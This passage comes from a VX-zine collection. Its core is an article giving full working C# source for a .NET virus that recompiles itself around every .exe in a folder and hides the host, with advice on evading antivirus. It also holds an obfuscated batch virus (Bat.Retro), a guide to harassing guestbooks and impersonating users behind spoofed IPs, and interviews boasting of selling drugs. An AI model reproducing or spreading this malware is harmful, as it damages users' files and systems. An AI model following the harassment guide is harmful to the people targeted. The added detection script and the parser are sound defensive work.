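    volume = struct.pack("<IIII", 0x10 + len(label) + 1, 3, 0x1234ABCD, 0x10)
    volume += label + b"\x00"
    vol_off = 0x1C
    path_off = vol_off + len(volume)
    rest_off = path_off + len(path) + 1
    info = struct.pack("<IIIIIII", rest_off + 1, 0x1C, LOCAL_PATH,
                       vol_off, path_off, 0, rest_off)
    info += volume + path + b"\x00" + b"\x00"   # empty remaining pathname
    return header + id_list + info


if __name__ == "__main__":
    print(parse_lnk(build_sample()))
```

Every length and offset in a shortcut is attacker-controlled input, so the reader rejects any value that leaves the structure it belongs to instead of walking memory until it finds a zero byte.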

articles

Using the .NET runtime compiler for file infection
DiA

 ______________________________________________________________
|                                                              |
| Using the .NET runtime compiler for file infection           |#
| »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»           |#
|                                                              |#
| by DiA/RRLF (c)2006                                          |#
| www.vx-dia.de.vu :: DiA_hates_machine@gmx.de                 |#
|______________________________________________________________|#
 ###############################################################

 _Overview___________________________________
|                                            |
| 1_Intro                                    |#
| 2_The main idea                            |#
| 3_My ideas, and what not worked            |#
| 4_How it can work                          |#
| 5_Working source code                      |#
| 6_Make it strong, further ideas            |#
| 7_Outro                                    |#
|____________________________________________|#
 #############################################

.Disclaimer
»»»»»»»»»»

The author of this article is NOT responsible for possible damage arising from the information you get here. You do your own things at your own risk, please don't do anything stupid, for your own security. This document is for educational purposes only. If you do NOT agree with this, please close this for your own pleasure!

.1_Intro
»»»»»»»

Hello and welcome to my second article on .NET and C#. Again I got bored of programming in C++. So, this is again a sidestep into the easy and simple world of .NET programming. In this tutorial I describe how to infect executables by using the .NET runtime compiler. I also provide a working source code with comments and ideas/hints on how to make a real virus with this technique.

.2_The main idea
»»»»»»»»»»»»»»»

When I played with the runtime compiler, I also checked out all the compiler options and parameters. Resource files (any kind, .jpg, .doc, .xxx) can be compiled within the source. And .NET provides a ResourceManager, which makes reading resources in .NET files very easy. So the main idea is to compile the virus anew every time a victim is found, and the victim will be added as a resource. Then at runtime, extract the resource and run the host file.

To act like this, the virus must have its own source to compile. Since .NET executables (not abused) are like open source (use Reflector) we just don't really care.

.3_My ideas, and what not worked
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

I had good ideas before I started coding this example virus, but it turned out that many of them don't work very well:

Source as String - I wanted to store the source code of the virus as a string in the virus body. It was much, much work, and not really worth it. You have to take care that your source is compiled right (care for " as an example), and the string max length (in source) is 2046 bytes.

Load host in memory - You can load a .NET assembly (a .exe for example), and invoke (execute) it in your currently running application. This would be nice, because you don't have to drop the host on disk and run it. But it turned out that this technique is only fine for stand-alone applications. Trying to execute an application linked to .dll's or other needed files will cause problems or errors. Anyway, here is the source I tried, the host file is in a byte array:

    //...
    Assembly HostAsm = Assembly.Load(HostArray); //byte array, .exe
    MethodInfo HostMethod = HostAsm.EntryPoint; //main
    HostMethod.Invoke(HostAsm.CreateInstance(HostMethod.Name), null); //execute
    //...

Check for infection - To not re-infect files, we have to check for infection. Good, as .NET has a ResourceManager, and the already infected files must have a resource named like we want it. Try to read a byte: if no error occurs the file seems to be infected, an error means no resource named like ours, which means not infected. But somehow I can't close the resource stream when the host resource doesn't exist. And if the stream is still open, we can't delete the victim file (nor recompile it). It's mystic that .NET allows opening a non-existing stream, but is not able to close this stream. Anyway, improve!

.4_How it can work
»»»»»»»»»»»»»»»»»

So, much doesn't work as I wanted, improve is the keyword. And improve means going simple, and using already known techniques. This is how the example virus works:

The virus source is also in the binary as a resource, and will be read and dropped to disc when needed. But first the host is read from the resource stream, dropped to disc, and executed. After termination the temporary host will be deleted. Here goes the infection (source code is already on disc). The virus finds all .exe files in the current directory, copies that file to <filename>.res, deletes the original victim, and compiles the virus source (in the same directory) to the .exe name of the victim. On compiling it adds the host binary and the virus source as resources. After compilation the virus writes its infection marker into the PE header. If something goes wrong the temp resource file is copied back, to leave the host uninfected.

Before infecting, the virus also checks if the found .exe is a .NET application and if the victim is already infected, by checking 4 bytes in the PE header (WIN32_VERSION). For more details please check the source code in the next section, there are also comments to help you understand what I mean.
.5_Working source code »»»»»»»»»»»»»»»»»»»»» using System; using System.IO; using System.Reflection; using System.CodeDom.Compiler; using Microsoft.CSharp; using System.Resources; using System.Diagnostics; using System.Windows.Forms; //namespaces we use in this virus namespace Biskin //our namespace { class DiA //we use just this one class, simple virus { static void Main(string[] args) //our entry point { byte[] Marker = {0x42, 0x53, 0x4B, 0x69}; //"BSKi", our infection marker to prevent re-infection string SourceName = ""; //here we store the extracted source code, we define it here because we handle it in more try/catch then one Random RanNumber = new Random(DateTime.Now.Millisecond); //to generate random number, user current millisecond as seed Assembly ThisAsm = Assembly.GetExecutingAssembly(); //the own assembly, to extract the resources (host & source) try //we use some try/catch blocks in this virus, error handling in c# is nice { Stream ResStream = ThisAsm.GetManifestResourceStream("host.bin"); //get the stream for the resource "host.bin" string HostName = RanNumber.Next(99999).ToString() + ".scr"; //generate a temporary host name, just andom number and .scr extension FileStream HostTemp = new FileStream(HostName, FileMode.CreateNew, FileAccess.Write); //filestream to write from resource to file for(int i = 0; i < ResStream.Length; i++) //write byte by byte until we reach end of file { HostTemp.WriteByte(Convert.ToByte(ResStream.ReadByte())); //read byte from stream and write it to file } HostTemp.Close(); //close file stream ResStream.Close(); //close resource stream File.SetAttributes(HostName, FileAttributes.Hidden); //set the temp host to hidden string HostParameters = " "; //to store host's parameter, drag and drop or called via command line for(int i = 0; i < args.Length; i++) //for each argument (parameter) given to the virus { HostParameters += args[i] + " "; //append it to string and put a space between } Process.Start(HostName + 
HostParameters).WaitForExit(); //start temporary host and wait for it's termination File.Delete(HostName); //after termination, delete the temporary host } catch //error on reading resource or write/run temp host { MessageBox.Show("Can't execute application", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); //show fake error then } try //try to extract source code { Stream SrcStream = ThisAsm.GetManifestResourceStream("biskin.src"); //get stream to resource SourceName = RanNumber.Next(99999).ToString() + ".cs"; //create temporary source file name, random number FileStream SourceTemp = new FileStream(SourceName, FileMode.CreateNew, FileAccess.Write); //open filestream for write source to disk for(int i = 0; i < SrcStream.Length; i++) //write byte by byte { SourceTemp.WriteByte(Convert.ToByte(SrcStream.ReadByte())); //read byte from resource and write it to file } SourceTemp.Close(); //close file stream SrcStream.Close(); //close resource stream } catch //error on reading/writing source code { Application.Exit(); //no source, no infection is possible, exit virus } string[] Files = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"); //get all .exe files in current directory foreach(string Victim in Files) //for loop all files in the array { try{AssemblyName.GetAssemblyName(Victim);} //easy way to check if founded file is a .NET catch{continue;} //if no .NET executable, try next file byte[] IsMarker = new byte[4]; //array where we read the marker FileStream VictimFile = new FileStream(Victim, FileMode.Open, FileAccess.Read); //open potential vicitm for read for(int i = 0; i < 136; i++) //skip first bytes { VictimFile.ReadByte(); //by reading bytes to nothing } VictimFile.Read(IsMarker, 0, Marker.Length); //read now 4 bytes to array VictimFile.Close(); //and close file stream //check if readed bytes are our infection marker, if so try next file if(IsMarker[0] == Marker[0] && IsMarker[1] == Marker[1] && IsMarker[2] == Marker[2] && IsMarker[3] == Marker[3]) 
continue; string ResourceFile = Victim.Remove(Victim.Length - 3, 3) + "res"; //create temp file name for the host resource File.Copy(Victim, ResourceFile); //copy uninfected host to temporary file File.SetAttributes(ResourceFile, FileAttributes.Hidden); //and set it to hidden try{File.Delete(Victim);} //try to delete the victim catch { File.Delete(ResourceFile); //if it still run, delete temp resource file continue; //and leave it uninfected } try //action! try to compile virus source with source and host binary as resource { ICodeCompiler Compiler = new CSharpCodeProvider().CreateCompiler(); //create compiler CompilerParameters Parameter = new CompilerParameters(); //and it's parameters Parameter.GenerateExecutable = true; //we want to create a exe, sure Parameter.MainClass = "Biskin.DiA"; //the main class, we are now in it Parameter.OutputAssembly = Victim; //compile output, the victim name (we deleted it already) //some raw compiler commands, optimize output, make windows application (no command prompt shit) //and add via "/resource" the host binary (we copy it before) and the virus source (we extracted it before) Parameter.CompilerOptions = "/optimize /target:winexe /resource:" + ResourceFile + ",host.bin /resource:" + SourceName + ",biskin.src"; foreach(Assembly Asm in AppDomain.CurrentDomain.GetAssemblies()) //lazy style { Parameter.ReferencedAssemblies.Add(Asm.Location); //just reference all assemblies we found, so we are sure our virus has all to compile } if(Compiler.CompileAssemblyFromFile(Parameter, SourceName).Errors.Count == 0) //compile! 
and check if no compile errors { VictimFile = new FileStream(Victim, FileMode.Open, FileAccess.ReadWrite); //open the freshly compiled executable for(int i = 0; i < 136; i++) //skip first bytes { VictimFile.ReadByte(); //by read bytes to nothing } VictimFile.Write(Marker, 0, Marker.Length); //then write our infection marker to WIN32_VERSION in the PE header (unused space) VictimFile.Close(); //close file stream } else //argh, compiler error { File.Copy(ResourceFile, Victim); //copy resource file back to real name, and leave it uninfected } File.Delete(ResourceFile); //delete reosurce file and handle next file } catch{} //any error is redirected here, just do nothing } try{File.Delete(SourceName);} //try to delete source file, should work catch{File.SetAttributes(SourceName, FileAttributes.Hidden);} //if it's still in use just set it to hidden } } } //done. .6_Make it strong, further ideas »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Sure, the provided source code is just a proof of concept, and not done to stay in the wild or anything like that. Here are some add's you have to make if you want make this virus (or your virus) a good one: Where is my icon? The icon of the compiled virus (within host) is the default windows application icon, cause we didn't give the compiler any icon. To prevent this, just extract the icon from the potential victim (google hint: Code Corner - Tools - Icon Browser), and give it as compiler parameter "/win32icon:filename". After that delete the extracted icon. And all is fine. And where are my file properties? Also the compiled file don't have any properties, such as Name, Copyright, Trademark, etc. This is also very simple issue, properties of the file can be read like this: //... 
foreach(object Attribute in Assembly.LoadFrom("Victim.exe").GetCustomAttributes(false)) //check all attributes { AssemblyCopyrightAttribute Copyleft = Attribute as AssemblyCopyrightAttribute; //as copyright attribute, as example if(Copyleft != null) //found copyright attribute? { string OldCopyright = Copyleft.Copyright; //the copyright to string } } //others can be read in the same way //... Then write in the virus source (after used namespaces, before own namespace) this (don't foget namespaces System.Reflection and System.Runtime.CompilerServices): //... [assembly: AssemblyCopyright(OldCopyright)] //... Other assembly informations are AssemblyTitle, AssemblyDescription, AssemblyConfiguration, AssemblyCompany, AssemblyProduct, AssemblyTrademark, AssemblyCulture. Filetime? Also take care for filetime, read filetime of potential victim and set it after compilation again. Easy, huh? Detected in < 1min? This is not a hard take for AV people, cause the plain source is stored. So a good idea is to encrypt the source code resource. Maybe also with a changing key. .NET provides also encryption classes like DES or even TripleDES. Also you can encrypt the host resource, so it can't be easiely cut out of the virus and be restored. More More More! Now it's on you, imagin you are at source level, so polymorphism is not a hard take, also adding garbage is a good idea. Encrypt strings, split source to 100s classes, etc etc. Use your brain. .7_Outro »»»»»»» Hope you liked this article and the idea how to use the .NET runtime compiler for file infection. If you do anything in this way, let me know, DiA_hates_machine@gmx.de. Next time friends, bye. DiA/RRLF - 23.08.2006
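An added example, not DiA's code and not part of the original article: a Python triage check built only from the indicators the source above exposes, namely the 4-byte marker "BSKi" at fixed file offset 136 and the manifest resource names host.bin and biskin.src. It also reports which PE32 header field that fixed offset lands in for the file at hand, which depends on where the file's PE header starts. The sample header built by `build_sample` is constructed and assumes a PE header at 0x80.

```python
import struct

MARKER = bytes([0x42, 0x53, 0x4B, 0x69])        # "BSKi", from the page's source
MARKER_OFFSET = 136                              # fixed file offset the page's code uses
RESOURCE_NAMES = (b"host.bin", b"biskin.src")    # resource names from the page's source

# (offset from the "PE\0\0" signature, size, name) for a PE32 image
PE32_FIELDS = [
    (0, 4, "Signature"), (4, 2, "Machine"), (6, 2, "NumberOfSections"),
    (8, 4, "TimeDateStamp"), (12, 4, "PointerToSymbolTable"),
    (16, 4, "NumberOfSymbols"), (20, 2, "SizeOfOptionalHeader"),
    (22, 2, "Characteristics"), (24, 2, "Magic"),
    (26, 1, "MajorLinkerVersion"), (27, 1, "MinorLinkerVersion"),
    (28, 4, "SizeOfCode"), (32, 4, "SizeOfInitializedData"),
    (36, 4, "SizeOfUninitializedData"), (40, 4, "AddressOfEntryPoint"),
    (44, 4, "BaseOfCode"), (48, 4, "BaseOfData"), (52, 4, "ImageBase"),
    (56, 4, "SectionAlignment"), (60, 4, "FileAlignment"),
    (64, 2, "MajorOperatingSystemVersion"), (66, 2, "MinorOperatingSystemVersion"),
    (68, 2, "MajorImageVersion"), (70, 2, "MinorImageVersion"),
    (72, 2, "MajorSubsystemVersion"), (74, 2, "MinorSubsystemVersion"),
    (76, 4, "Win32VersionValue"),
]


def field_at(data, file_offset):
    """Name the PE32 header field covering file_offset, or None if unknown."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]     # e_lfanew
    if data[pe:pe + 4] != b"PE\x00\x00":
        return None
    rel = file_offset - pe
    if rel >= 24:
        # Optional-header offsets in the table are only valid for PE32 (magic 10Bh).
        if pe + 26 > len(data) or struct.unpack_from("<H", data, pe + 24)[0] != 0x10B:
            return None
    for off, size, name in PE32_FIELDS:
        if off <= rel < off + size:
            return name
    return None


def triage(data):
    """Check one file's bytes against the indicators listed above."""
    marker = data[MARKER_OFFSET:MARKER_OFFSET + len(MARKER)] == MARKER
    # Manifest resource names are stored as plain UTF-8 in the metadata string heap,
    # so a byte search is enough for a first-pass check.
    resources = [n.decode() for n in RESOURCE_NAMES if n in data]
    if marker and len(resources) == len(RESOURCE_NAMES):
        verdict = "match"
    elif marker or resources:
        verdict = "partial"
    else:
        verdict = "clean"
    return {"marker_at_136": marker, "header_field": field_at(data, MARKER_OFFSET),
            "resources": resources, "verdict": verdict}


def build_sample(infected):
    """Constructed PE32 header stub for the demo; not a runnable executable."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)          # assumption: PE header at 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<HH", buf, 0x84, 0x014C, 3)    # Machine, NumberOfSections
    struct.pack_into("<I", buf, 0x88, 0x44EC2B00)    # TimeDateStamp (constructed value)
    struct.pack_into("<H", buf, 0x98, 0x010B)        # optional header magic: PE32
    if infected:
        buf[MARKER_OFFSET:MARKER_OFFSET + 4] = MARKER
        buf += b"\x00host.bin\x00biskin.src\x00"
    return bytes(buf)


if __name__ == "__main__":
    for flag in (True, False):
        print(triage(build_sample(flag)))
```

A "partial" result deserves a manual look rather than a verdict: four bytes at a fixed offset can collide with a legitimate header value, and host.bin is a plausible resource name in unrelated software.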

articles

That's it
DiA

That's it. With the RRLF Best Of I resign from the VX scene. I had a blast meeting very nice people, virtual or even real life. You all know who you are! I wish you all luck in the future, keep kicking asses. I will regularly check news about viruses etc. and I hope that you people, the left VX scene, and new dudes will bring a smile in my face by providing innovative ideas and contrast from all that commercial criminal software shit. Also I will still regularly check my mail DiA_hates_machine@gmx.de. Drop some lines if you feel like!

Thanks,
DiA - RRLF Rockstars

arts

A Bath disk0rdia

arts

Dare a Step out of the Norm disk0rdia

arts

Rotted Dolomite

articles

Interview with Necronomikon dr.g0nZo

dr.g0nZo: Hi Necronomikon! How are you doing? Can you tell us where you live at the moment, and how old you are?
Necronomikon: Hi ppl, I'm doing great at the moment (with a few exceptions, but it'll get better again)! At the moment I live in Lower Saxony (Germany ;)) and I'm 19 years old.
dr.g0nZo: What do you do, are you still in school?
Necronomikon: For a good half a year I've been attending a vocational school in my town (let's see what it brings!?)
dr.g0nZo: Are there any regular bars or discos you go to?
Necronomikon: There are a few in town, for example the Flax, the Malibu, Schiller Pub, the Strohhalm, where I hang out at the weekend when I'm not visiting discos like the Bierdorf in my town or, out of town, the Novum, Fun2000 (and others in "H"!), JollyJoker, Inkognito and others.... (Well! Do you know where I come from!???)
dr.g0nZo: You used to be a member of ours, why did you leave again? Supposedly you also left Germany once, problems with the state?
Necronomikon: It's true that I was a member of yours. I left because I had a lot to do at the time and not much was left over for coding, and I didn't want to get kicked out of the group as a lazy member, like at DPS (who don't know that a virus sometimes takes longer than just 10 mins.!), so I got out for the time being to deal with other things! (friends, etc...)
dr.g0nZo: Do you have experience with drugs?
Necronomikon: Drugs! In the past yes, at parties and in discos (party stuff ;))! I consumed less, sold more! Now next to nothing, since as an athlete it tends to affect you negatively!!!
dr.g0nZo: What moved you to get into the VX scene?
Necronomikon: Hmmm!? It started when viruses like "Melissa" went through the media (back then one of the most widely, fastest, etc. spread macro viruses). On the internet I found the source code on a page, and other useful tools too that come from the VX scene. I experimented a lot with the tools and source code and learned from it, until one day I met other VXers on IRC...
dr.g0nZo: How did you learn programming, and which programming languages do you know?
Necronomikon: Learned through books, tutorials and other people from IRC! Basics (QBasic, PowerBasic, a bit of WordBasic, Visual Basic, VBA and VBS), HTML, assembler and a few script languages. But for the most part I use win32asm.
dr.g0nZo: What kind of viruses do you mainly write?
Necronomikon: I've already written all kinds of viruses in win32asm, VBx (...HTML ;))...
dr.g0nZo: Are you in a group at the moment, and if so, which one?
Necronomikon: At the moment I'm a member of Zero Gravity.
dr.g0nZo: OK, I think that's enough questions, do you want to greet anyone?
Necronomikon: I can greet a lot of people... Hmmmm!?
SnakeByte and jackie/MATRiX: Thanks for your help in all situations... ! ;)
Serial Killer: Give my regards to your wife and kid!!!
everyone from #german_vir, like Malfunction, mgl, doop, ....., and chief Pussyhunter Daniel- ;)
Fii7e and ocker: We'll surely see each other again in the next few days.
Lys Kovick: without ya Word97.Blade would be nothing...
Rhape79: Come back to #virus!
prizzy: We could talk again about the differences in spelling between polish and czech rudewords l8r in #virus.=o]
Gigabyte: Wodka + Redbull rulez...
all on #virus, #vir, #zerogravity
dr.g0nZo: Or is there anything else you want to tell mankind?
Necronomikon: Well, pretty much everything has been said. A question for you (Dr.G0nZo)! Have I met you in #virus before, or was that another person, who claimed not to be a member of rRlf!?
dr.g0nZo: No, sorry, that wasn't me. But someday the world will apparently belong to the dr.g0nZos!
Necronomikon: Byez

Necronomikon [Zer0Gravity]

articles

Interview with rastafarie dr.g0nZo

dr.g0nZo: ALO rastafarie! How are you?
rastafarie: ALO. Yeah, pretty good. Already looking forward to the interview!
dr.g0nZo: As we know, you want to leave the rRlf, why?
rastafarie: It was a nice time, but with what I do I feel a little out of place in the Liberation Front. Lately I've been running out of ideas, so I came to the decision to leave.
dr.g0nZo: Sounds pretty serious, have you been thinking about it for long?
rastafarie: Err ... Yes, ever since I've been stuck in this creative hole. About 1/2 a year already.
dr.g0nZo: Wohh, your pictures are pretty good, I almost got high from looking at them for a while. What, apart from the pictures, have you done?
rastafarie: Well, my activity was a pretty interesting one, I had numerous projects running. Among others, building myself a Laetitia Casta jpg collection, and so I ended up with a respectable, high-quality Casta collection of around 1235 files.
dr.g0nZo: That's one way to use the FLAT too. Different topic. Are you experienced in drug sport (getting high ;) ?
rastafarie: Well ... over time you do gather some experience there... I mean, I made some of my pictures for the rRlf while completely wasted... I collected quite a lot of ideas while completely wasted and also realized some of them on the PC. That was already before my rR time. And about 4 years ago it started together with TeAgeCe...
dr.g0nZo: He used to be with us too... Will you accompany philet0ast3r to Amsterdam in August, to the VX meeting? As a "walk into the desert".
rastafarie: Well, I think it would be huge fun. But I'll use that time otherwise, to improve my bong skills. That will once again probably be in Poland, where a "small" drug scene has established itself around TeAgeCe (Gratz) and me. Big potato fields, big high, huge fun...
dr.g0nZo: Any nice stories about getting high? How did you get your dreads? Did friends work on your head?
rastafarie: Hehe ... Well, after thinking for a while I'd surely come up with some 23000 stories, but my memory doesn't allow me to answer spontaneously ... [rRausch] :) The thing with my dreads is like this ... 3 years ago I decided to let my hair grow long. Back then I had about 3-4 mm. Well, once I had a lion's mane, I stopped washing my hair and decided to let a biotope grow on my skull and to fertilize it with silica. Yes, and for 3/4 of a year now I've had the things on my head.
dr.g0nZo: Are you politically active? What do you think of fuckin Schröder's hair dye? *ggg* (it gets really gay now)
rastafarie: Well, first to come to our stylish chancellor... I think gay peroxide blond would also suit our Gerhard well... The whole debate in the media, the lawsuit against the DPA, I find ridiculous... Has nothing more important to do than to practise unrestricted loyalty to his hair color... I'm not very politically active, but I'm already looking forward to 22-23 May ... when maestro W. Bush is in Berlin...
dr.g0nZo: Yeah yeah, da Bush Schorre ... Unfortunately I can't come along. What do you get up to at the weekend, or on days off, where do you go (bars, discos, ...)?
rastafarie: Going to bars or roaming through discos isn't really my thing... I mostly go to concerts with the other rRs and friends ... You know what I'm talking about... In my free time I don't do anything particularly exciting, apart from getting high, playing basketball or strumming a bit on the guitar ... I'm just about to start a band with a few pendejos... [âlo Beso Negro] ... next week we have our first little gig, at our bassist's birthday ... :-]
dr.g0nZo: ... Oh, the bratwursts are charring. So you won't have any problems with groupies yet, not yet.
rastafarie: Well ... not quite ... So some time ago ... 3 weeks ago today I still had something going with a hot blonde... Really classy ... => *wooow fresh* She picked up eeo and me at the BB court... The only thing that bothered were her two kids ... =)
dr.g0nZo: You mean the ones who always called her mother?
rastafarie: héhé ... *fuuuuuck*
dr.g0nZo: 0kAY. Was a nice grill session, the world got no richer for it, on the spiritual level. Thanks for the thing with the Jackass-style puking dog, and for your time. Do you want to send greetings out to the people?
rastafarie: Vrallé ... Greetings to all rR and ex-members and all phucked up borrachos from Beso Negro and everyone reading this article. Uh, Casta pics sharing: rastafarie@gmx.net

articles

Low cost advertisement at a higher l3vel dr.g0nZo

Low cost advertisement at a higher l3vel
*****************************************
by dr.g0nZo

1. Find a sucking guest-book. I suggest taking something like funky-needles.de.vu or u-Boot.com. But nothing such as the Something Awful forums!
2. Diss all the persons without a reason, make some nice advertisements for your site. Use an AKA that isn't named on it.
3. It's good to have a lot of those gb's. Hey, it's about using "guerilla tactics": harm the others short 'n powerful, then escape.
4. After about a week or so return to the gb's and look around. What were the results or replies to you?
5. In most cases the replies are things like: "Who the f'n hell are you? Go away damn jerk!" Congratulations! Your first scandal!
6. Get to a higher level of "Kiddie-Terrorism". Use the AKA of a well known member. Ahh, but before that I advise you to establish a call-by-call connection on your PC and to download an IP spoofer (www.gcf.de); hurting the psyche of very new newbies is a good way to start. Hope you chose the name of the most respected one ...
7. Later the "victim"/real owner of the name is going to teach you respect ... LOL. Use his name again; two with the same AKA, hmm, could be really funny, or?

Remember: a g-book of lamerz, not one of the scene! Don't know what more to say, but stay tricky and fake all those sunday-i-net users! THX for reading; if you think what I wrote is nonsense, tell me.

dr.g0nZo

articles

stEamiNg RangeR - rRlf driNk dr.g0nZo

hi folks! today, i'm introducing you into the world of cheap lower low cost mixtures, which we need for our brains to work. ;) if you're thinking i'm silly, do so. that bores all.

serious part:

conditions: you need to have a party, hope there're some mafuckas who you spit at so it's funnier for you to steal some whiskey. drugs are necessary. further you should have a bottle of jack daniels, cola and orangejuice...

ok, mix that shit as following:
1/5 of the stolen bottle jackie
2/5 cola
2/5 from the orangejuice

enjoy your inexpensive drink...

another tip: take 1L becks, and 2G weed. mix it. wait about five minutes. drink it with friends

sources

Bat.Retro DvL
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%%**.................%p%*..................%%*****..............%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%***********........%%***................%%*******............%%*..................%%*..................%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\p%***................%%****************...%%**************.....%%***................%%**.................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\q%*************......%%**********.........%%***********........%%************.......%%********...........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%******.............%%***................%%*******************%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%**********.........%%****************...%%*****************..%p%*..................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%*..................%%****************...%%**************.....%%******************.%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%****...............%j%***................%%****************...%~1\ >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\%******************.%%*****************..%%**************.....%%****...............%w%****************...%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%pp%***************....%%*..................%j~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******.............%%*..................%%***................%%*****..............%%**.................%%********...........%~1\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%**************.....%%****...............%%****************...%%************.......%%*..................%~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%******************.%%*************......%%***************....%%*..................%\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\g%*****..............%%****...............%%************.......%%**.................%%*********..........%%*..................%%*****..............%\%******************.%%*****************..%g%*****..............%%****...............%%************.......%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%***********........%q\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
